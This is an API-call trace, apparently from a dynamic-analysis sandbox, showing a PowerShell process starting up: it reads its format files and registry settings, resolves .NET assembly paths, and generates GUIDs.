	[0425.685] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x7dc5aead, Data2=0x1374, Data3=0x4c06, Data4=([0]=0xb5, [1]=0x41, [2]=0x79, [3]=0xd2, [4]=0x32, [5]=0xc9, [6]=0xbc, [7]=0x49))) returned 0x0
	[0425.686] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x9e72b778, Data2=0x9967, Data3=0x4c11, Data4=([0]=0xa1, [1]=0xd0, [2]=0x15, [3]=0x2d, [4]=0x91, [5]=0x56, [6]=0xab, [7]=0xbc))) returned 0x0
	[0425.686] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xc893ccec, Data2=0xdbcb, Data3=0x4f46, Data4=([0]=0x93, [1]=0xc5, [2]=0xec, [3]=0xa2, [4]=0xf3, [5]=0x86, [6]=0x2f, [7]=0x80))) returned 0x0
	[0425.687] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xf13c3647, Data2=0x36f9, Data3=0x4b3c, Data4=([0]=0x9f, [1]=0x6b, [2]=0x53, [3]=0x15, [4]=0xd6, [5]=0x4, [6]=0x3f, [7]=0x90))) returned 0x0
	[0425.687] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x3dd1e82, Data2=0x8db4, Data3=0x4e54, Data4=([0]=0xa9, [1]=0xc1, [2]=0x5b, [3]=0x10, [4]=0x99, [5]=0xe2, [6]=0x60, [7]=0x6c))) returned 0x0
	[0425.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.688] SetErrorMode (uMode=0x1) returned 0x1
	[0425.688] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0425.688] GetFileType (hFile=0x1c4) returned 0x1
	[0425.688] SetErrorMode (uMode=0x1) returned 0x1
	[0425.688] GetFileType (hFile=0x1c4) returned 0x1
	[0425.688] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.689] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.689] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.690] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.690] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.690] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.690] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0xaca, lpOverlapped=0x0) returned 1
	[0425.690] ReadFile (in: hFile=0x1c4, lpBuffer=0x343547a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x343547a*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0425.691] ReadFile (in: hFile=0x1c4, lpBuffer=0x3435e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x3435e48*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0425.691] CloseHandle (hObject=0x1c4) returned 1
	[0425.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.691] SetErrorMode (uMode=0x1) returned 0x1
	[0425.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0425.691] SetErrorMode (uMode=0x1) returned 0x1
	[0425.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.691] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0425.691] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0425.691] CoTaskMemAlloc (cb=0x5a) returned 0x1b349950
	[0425.691] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x1b349950, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0425.691] CoTaskMemFree (pv=0x1b349950) 
	[0425.691] RegCloseKey (hKey=0x1c4) returned 0x0
	[0425.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0425.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0425.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0425.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0425.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0425.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0425.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0425.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0425.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0425.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0425.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0425.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0425.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0425.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0425.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0425.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0425.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0425.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0426.252] VirtualQuery (in: lpAddress=0x18bfa0, lpBuffer=0x18ce60, dwLength=0x30 | out: lpBuffer=0x18ce60*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.252] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x80dc9440, Data2=0xe9d2, Data3=0x4710, Data4=([0]=0xb3, [1]=0xb6, [2]=0xee, [3]=0xf4, [4]=0x83, [5]=0xb2, [6]=0x81, [7]=0xa2))) returned 0x0
	[0426.253] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x3f1b4780, Data2=0xcb1, Data3=0x433d, Data4=([0]=0x91, [1]=0x11, [2]=0x49, [3]=0xeb, [4]=0x9, [5]=0x5e, [6]=0x3f, [7]=0x3d))) returned 0x0
	[0426.254] VirtualQuery (in: lpAddress=0x18c150, lpBuffer=0x18d010, dwLength=0x30 | out: lpBuffer=0x18d010*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.254] VirtualQuery (in: lpAddress=0x18c150, lpBuffer=0x18d010, dwLength=0x30 | out: lpBuffer=0x18d010*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.255] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x5e7abaec, Data2=0xd26f, Data3=0x4a22, Data4=([0]=0x81, [1]=0x59, [2]=0xac, [3]=0x53, [4]=0x76, [5]=0xe8, [6]=0x11, [7]=0x37))) returned 0x0
	[0426.258] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xeed40922, Data2=0xefad, Data3=0x4f9d, Data4=([0]=0x8e, [1]=0xd4, [2]=0x3e, [3]=0x20, [4]=0x3d, [5]=0x21, [6]=0x75, [7]=0x7b))) returned 0x0
	[0426.258] VirtualQuery (in: lpAddress=0x18c3a0, lpBuffer=0x18d260, dwLength=0x30 | out: lpBuffer=0x18d260*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.259] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.259] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.259] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xc2c48e60, Data2=0xcd56, Data3=0x4a6e, Data4=([0]=0xa2, [1]=0xf7, [2]=0x93, [3]=0x1b, [4]=0x61, [5]=0x5e, [6]=0xbc, [7]=0x32))) returned 0x0
	[0426.259] VirtualQuery (in: lpAddress=0x18c3a0, lpBuffer=0x18d260, dwLength=0x30 | out: lpBuffer=0x18d260*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.260] VirtualQuery (in: lpAddress=0x18c1c0, lpBuffer=0x18d080, dwLength=0x30 | out: lpBuffer=0x18d080*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.260] VirtualQuery (in: lpAddress=0x18ba10, lpBuffer=0x18c8d0, dwLength=0x30 | out: lpBuffer=0x18c8d0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.260] VirtualQuery (in: lpAddress=0x18ba10, lpBuffer=0x18c8d0, dwLength=0x30 | out: lpBuffer=0x18c8d0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.260] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xf9394a47, Data2=0x86aa, Data3=0x4bfb, Data4=([0]=0x9a, [1]=0x93, [2]=0x51, [3]=0x45, [4]=0x3e, [5]=0x57, [6]=0xbd, [7]=0x33))) returned 0x0
	[0426.260] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x30a0702d, Data2=0x8880, Data3=0x45fa, Data4=([0]=0xbd, [1]=0xb8, [2]=0x95, [3]=0x8f, [4]=0xf9, [5]=0xa0, [6]=0x9, [7]=0x28))) returned 0x0
	[0426.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0426.261] SetErrorMode (uMode=0x1) returned 0x1
	[0426.261] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0426.261] GetFileType (hFile=0x1c4) returned 0x1
	[0426.261] SetErrorMode (uMode=0x1) returned 0x1
	[0426.261] GetFileType (hFile=0x1c4) returned 0x1
	[0426.261] ReadFile (in: hFile=0x1c4, lpBuffer=0x34e8440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x34e8440*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.263] ReadFile (in: hFile=0x1c4, lpBuffer=0x34e8440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x34e8440*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.272] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.272] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.272] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.272] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.272] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.273] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.273] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.274] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.274] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.274] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.274] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.275] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.275] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
